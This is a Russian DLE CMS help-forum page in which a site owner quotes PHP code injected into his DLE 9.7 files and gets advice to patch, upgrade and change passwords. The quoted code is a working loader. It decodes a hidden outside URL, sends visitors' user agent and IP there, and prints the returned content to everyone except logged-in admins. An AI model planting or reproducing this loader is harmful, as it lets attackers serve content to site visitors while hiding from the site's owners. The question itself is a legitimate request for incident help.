Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Взлом сайта, вредоносный код

Взлом сайта, вредоносный код

     21.09.2013    DLE virus js    Все вопросы » Общие вопросы    3080

вопрос
На сайте в разных файлах появляется такой код:
function getnewsfromid($id) {
    $id = intval($id);
    $rtn = $id + date("j");
    return $rtn;
}

function mysql_safe_connect($in) {
    if (getnewsfromid(64) < 1024) {
    $rtn = base64_decode($in);
    return $rtn;
    }
}
function get_all_news_by_list($newsid) {
    if (date("j") - $newsid > 320 ) {
        $rtn = false;
    } else {
    $get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzcvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
    if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
    echo @file_get_contents($get);
    }
    }
}
get_all_news_by_list (date("j"));


Плагин для tinymce spellcheker был давно удалён, НО код появился несколько дней назад..


Возможно ещё есть дырки в DLE?
Версия движка - 9.7

Ответил: 23neon23

Патчи уже давным давно валяются на оф. сайте dle-news. А вообще, чтобы с ними не париться, просто обновите dle до актуальной версии 10.0. Также советую поменять все пароли: начиная от админки, заканчивая паролями FTP, баз данных и ПУ от хостинга.

1 комментарий

dj-avtosh
PHP-developer

dj-avtosh - 26 сентября 2013 23:38 -

Есть вирус у вас в компе)))
https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 17.10.2013 voveolegovich  Общие вопросы, Ламерские вопросы
 15.12.2013 deffos  Общие вопросы, Шаблоны (TPL), Ламерские вопросы
 14.01.2014 madrom007  Общие вопросы
 28.04.2014 NeZoX  Общие вопросы
 23.07.2014 maFFyoZZyk  Общие вопросы
 18.08.2014 nail_kasi  Общие вопросы
 13.09.2014 lodem009  Общие вопросы
 22.10.2014 vek21  Общие вопросы
 21.11.2014 Pathos  Общие вопросы
 28.02.2015 follor  Общие вопросы
  • Jigurda | Как в description вставить значение доп. ... 2
    Фото Jigurda
    Jigurda
    Как в description вставить значение доп.поля?
    Вчера, 10:54
    Немного не то. Нужно не заменить, а добавить к уже имеющемуся description свой текст с доп.полями
  • lutskboy | Как в description вставить значение доп. ... 2
    Фото lutskboy
    lutskboy
    Как в description вставить значение доп.поля?
    18-04-2024, 21:51
    https://sandev.pro/web/159-fullstory-metatags-by-sander.html
  • derebas | Как реализовать кнопку "Поделиться" как ... 1
    Фото derebas
    derebas
    Как реализовать кнопку "Поделиться" как на Плей Маркете?
    18-04-2024, 09:39
    Ну если на скорую руку то примерно так
    <style>
.sociallinks {
    display: none;
    position: fixed;
    z-index: 999;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.4);
}

.sociallinks-content {
    background-color: #fefefe;
    margin: auto;
    padding: 20px;
    border: 1px solid #888;
    width: 80%;
    max-width: 500px;
    border-radius: 10px;
    position: absolute;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
}

.close {
    color: #aaa;
    position: absolute;
    top: 10px;
    right: 10px;
    font-size: 28px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: black;
    text-decoration: none;
    cursor: pointer;
}

.social-container {
    display: flex;
    align-items: center;
}
.social-container > div {
    margin-left: 10px;
}

h2, p {
    margin: 5px 0;
}
.social {
  padding-top: 20px;
}
.social img {
  margin: 10px;
}
.sharebtn {
  padding-top: 20px;
  width: 100%;
}
.sharebtn_area {
  border: 1px solid black;
  height: 40px;
}
.sharebtn input[type="text"] {
  width: 70%;
  border: none;
  height: 95%;
}
.sharebtn button {
  width: 25%;
  height: 95%;
  border: none;
  background-color: #fff;
}
</style>
<button id="opensociallinksBtn">Поделиться</button>

<div id="mysociallinks" class="sociallinks">
  <div class="sociallinks-content">
    <span class="close">×</span>
    <div class="social-container">
        <img src="{image-1}" alt="Icon" width="30" height="30">
        <div>
            <h2>{title}</h2> 
            <p>Поделиться</p> 
        </div>
    </div>
    <div class="social">
        <a href="https://api.whatsapp.com/send/?text={full-link}"><img src="whatsapp.png" alt="WhatsApp" width="30" height="30"></a>
        <a href="https://www.facebook.com/sharer/sharer.php?u={full-link}"><img src="facebook.png" alt="Facebook" width="30" height="30"></a>
        <a href="https://twitter.com/intent/post?url={full-link}"><img src="twitter.png" alt="Twitter" width="30" height="30"></a>
        <a href="https://www.instagram.com/share?url={full-link}"><img src="instagram.png" alt="Instagram" width="30" height="30"></a>
    </div>
    <div class="sharebtn">
      <div class="sharebtn_area">
        <input type="text" id="inputText" value="{full-link}" readonly="true">
        <button id="copyBtn">Поделиться <img src="share.png" width="10px" alt="Share Icon"></button>
      </div>
    </div>
  </div>
</div>

<script>
var sociallinks = document.getElementById("mysociallinks");
var opensociallinksBtn = document.getElementById("opensociallinksBtn");
var closeBtn = document.getElementsByClassName("close")[0];
var copyBtn = document.getElementById("copyBtn");
var inputText = document.getElementById("inputText");

opensociallinksBtn.onclick = function() {
  sociallinks.style.display = "block";
}

closeBtn.onclick = function() {
  sociallinks.style.display = "none";
}

window.onclick = function(event) {
  if (event.target == sociallinks) {
    sociallinks.style.display = "none";
  }
}

copyBtn.onclick = function() {
  inputText.select();
  document.execCommand("copy");
}
</script>
  • doktorpull | GeoIP - показ информации в зависимости о ... 1
    Фото doktorpull
    doktorpull
    GeoIP - показ информации в зависимости от страны посетителя сайта
    17-04-2024, 21:53
    Отличный модуль, хорошо работает. Рекомендую этого автора, так как заказывал у него несколько собственных разработок. Человек знает свое дело.
  • Gordi | Telegram Sender 12
    Фото Gordi
    Gordi
    Telegram Sender
    16-04-2024, 15:47
    купил. Модуль классный! Автору большая признательность!
  • TeraMoune | Как вывести тайтл и дискрипшен по маске ... 1
    Фото TeraMoune
    TeraMoune
    Как вывести тайтл и дискрипшен по маске в категориях?
    14-04-2024, 00:36
    Ну например вот так: https://lazydev.pro/product/12-dle-seo.html
  • zawibis | Как настроить редирект на внешние сайты? 1
    Фото zawibis
    zawibis
    Как настроить редирект на внешние сайты?
    13-04-2024, 14:53
    Нашёлся ответ.
    Нужно в настройках группы отключить параметр

    Автоматическая замена ссылок [url] в тег [leech]
    При включении данной опции все ссылки, которые пользователь публикует в теге [url], будут автоматически заменены на защищенные ссылки тега [leech]
  • TeraMoune | Как решить проблему с /xfsearch/значение ... 5
    Фото TeraMoune
    TeraMoune
    Как решить проблему с /xfsearch/значение?
    12-04-2024, 11:53
    Это не прикол, просто dle позволяет искать новости как по значению так и с указанием конкретного поля для этого значения. И если у вас стоят метрики на сайте то достаточно любому человеку открыть ссылку и убрать в ней что-то, если сайт при новом url вернёт статус 200 то метрики захотят этот url запомнить.
  • komosa | Как решить проблему с /xfsearch/значение ... 5
    Фото komosa
    komosa
    Как решить проблему с /xfsearch/значение?
    11-04-2024, 22:34
    А вот прикол то в том, что это коснулось только author
  • lutskboy | Как решить проблему с /xfsearch/значение ... 5
    Фото lutskboy
    lutskboy
    Как решить проблему с /xfsearch/значение?
    11-04-2024, 22:31
    может быть не один только author. и другие поля. как знать куда перенаправлять
наверх